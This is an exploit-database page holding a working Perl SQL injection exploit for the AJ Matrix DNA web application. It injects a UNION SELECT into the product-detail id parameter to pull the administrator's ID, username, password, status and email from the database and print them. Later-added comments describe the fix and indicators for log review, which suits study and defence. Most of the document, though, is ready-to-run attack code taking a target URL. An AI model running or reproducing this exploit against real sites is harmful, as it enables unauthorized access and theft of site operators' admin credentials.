AJ Matrix DNA – SQL Injection

  • 作者: Br0ly
    日期: 2010-12-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15718/
  • #!/usr/bin/perl
    #|------------------------------------------------------------------------------------------------------------------
    #| -Info:
    # 
    #| -Name: AJ Matrix DNA
    #| -Site: http://www.ajsquare.com/ajhome.php
    #| -Bug: Sql Injection
    #| -Found: by Br0ly
    #| -BRAZIL >D
    #| -Contact: br0ly[dot]Code[at]gmail[dot]com
    #|
    #| -Gretz: Osirys , Out0fBound
    #|
    #| -p0c:
    #| -SQL INJECTION: 
    #|
    #| -9999+union+all+select+0,1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15--
    #|
    #|--------------------------------------
    #|-AJ Matrix DNA		 
    #| -Sql Injection 
    #| -by Br0ly
    #|--------------------------------------
    #|
    #|
    #|
    #|
    #| >D, And sorry for my bad english ;/
    #|
    #|
    
    use IO::Socket::INET;
    use LWP::UserAgent;
    
     # Command-line driver. The single argument is the base URL of an
     # AJ Matrix DNA installation; $sql_path is the product-detail request whose
     # `id` parameter the header comment reports as injectable.
     my $host     = $ARGV[0];
     my $sql_path = "/index.php?do=productdetail&id=";

     # Every outcome prints the banner first, so it is printed once here.
     banner();

     if (!@ARGV) {
         # No URL supplied.
         help("-1");
     }
     elsif (cheek($host) == 1) {
         # Argument passed the URL check.
         xploit($host, $sql_path);
     }
     else {
         # Argument supplied but rejected by the URL check.
         help("-2");
     }
    
    # Sends one GET request to the product-detail page with a UNION SELECT
    # appended to the `id` parameter, then prints the administrator record if
    # the response echoes it back.
    #
    # Arguments: $_[0] base URL of the installation, $_[1] request path ending
    # in "id=". Never returns: both the success and the failure branch call
    # exit(0), so the process exit status does not distinguish them.
    #
    # Reviewer notes (defensive):
    #  - Presumably the application places the `id` value into its SQL text
    #    unescaped; the server-side code is not shown here. Binding `id` as an
    #    integer parameter in a prepared statement is the fix for that class
    #    of bug.
    #  - Indicators visible in this request for log or WAF review: the literal
    #    "union+all+select" inside the id parameter, the table name
    #    ajmatrix_admin_table, and the hex marker 0x6272306c79 ("br0ly").
    #  - The admin_password column is printed exactly as the database returns
    #    it. NOTE(review): whether it is stored hashed is not visible from this
    #    script; confirm against the application schema.
    sub xploit() {
    
    my $host = $_[0];
    my $sql_path = $_[1];
    
    print "[+] Getting the id,login,pass,status of the admin.\n";
    
    # 16-column UNION. The last column concatenates the five admin fields,
    # separated by 0x3a (':') and wrapped front and back in the 0x6272306c79
    # marker so the record can be located inside the returned page.
    my $sql_atk = $host.$sql_path."-9999+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x6272306c79,0x3a,admin_id,0x3a,admin_username,0x3a,admin_password,0x3a,admin_status,0x3a,admin_email,0x3a,0x6272306c79)+from+ajmatrix_admin_table--";
    my $sql_get = get_url($sql_atk);
    # tag() rewrites spaces to '$' and all other whitespace to '*', so the
    # response contains no newline that would stop '.' in the pattern below.
    my $connect = tag($sql_get); 
    
    # Looks for the marker-delimited record: id, username, password, status, email.
    if($connect =~ /br0ly:(.+):(.+):(.+):(.+):(.+):br0ly/) {
    	print "[+] ID = $1\n";
    	print "[+] User = $2\n";
    	print "[+] Pass = $3\n";
    	print "[+] Status = $4\n";
    	print "[+] Email= $5\n";
    	exit(0);
    }
    else {
    	# Marker not found in the response.
    	print "[-] Exploit, Fail\n";
    	exit(0);
    
    }
     }
    
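     # Fetches the URL given in $_[0] with a single HTTP GET (4-second timeout)
     # and returns the response body.
     #
     # The body is returned whatever the HTTP status is; the response's success
     # flag is not consulted, so callers also receive the content of error
     # responses.
     sub get_url() {
         # Lexical copy of the argument. The original assigned to an undeclared
         # $link, which created a package global that outlived the call.
         my ($link) = @_;

         my $ua = LWP::UserAgent->new();
         $ua->timeout(4);

         my $response = $ua->request(HTTP::Request->new(GET => $link));
         return $response->content;
     }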
    
    # Returns a copy of $_[0] with every space replaced by '$' and every other
    # whitespace character (tab, newline, ...) replaced by '*'. The result
    # therefore contains no whitespace at all.
    sub tag() {
        my ($text) = @_;

        # Spaces first, so that the second pass only sees the remaining
        # whitespace characters.
        $text =~ tr/ /$/;
        $text =~ s{\s}{*}g;

        return $text;
    }
    
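    # Validates the command-line argument: returns 1 when $_[0] starts with
    # "http://", otherwise 0.
    #
    # The original pattern was unanchored, so any argument that merely
    # contained "http://" somewhere was accepted, and it carried a capture
    # group that was never read. The match is now anchored to the start of
    # the string.
    sub cheek() {
        my ($host) = @_;
        return $host =~ m{\Ahttp://} ? 1 : 0;
    }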
    
    # Prints an error line chosen by the numeric code in $_[0] (-1: no
    # argument given, -2: argument rejected), then the usage text, and ends
    # the process with exit status 0. Any other code prints the usage only.
    sub help() {
        my ($code) = @_;

        my $complaint = $code == -1 ? "\n[-] Error, missed some arguments !\n\n"
                      : $code == -2 ? "\n[-] Error, Bad arguments !\n"
                      :               '';
        print $complaint if length $complaint;

        print join '',
            "[*] Usage : perl $0 http://localhost/ajmatrixdna/\n\n",
            "Ex: perl $0 http://localhost/ajmatrixdna/\n\n";
        exit(0);
    }
    
    # Prints the script's name/author banner to STDOUT. The text matches the
    # boxed banner in the header comment of this file.
    sub banner {
        my $rule = "--------------------------------------\n";

        print join '',
            "\n",
            $rule,
            " -AJ Matrix DNA		 \n",
            " -Sql Injection \n",
            " -by Br0ly\n",
            $rule,
            "\n";
    }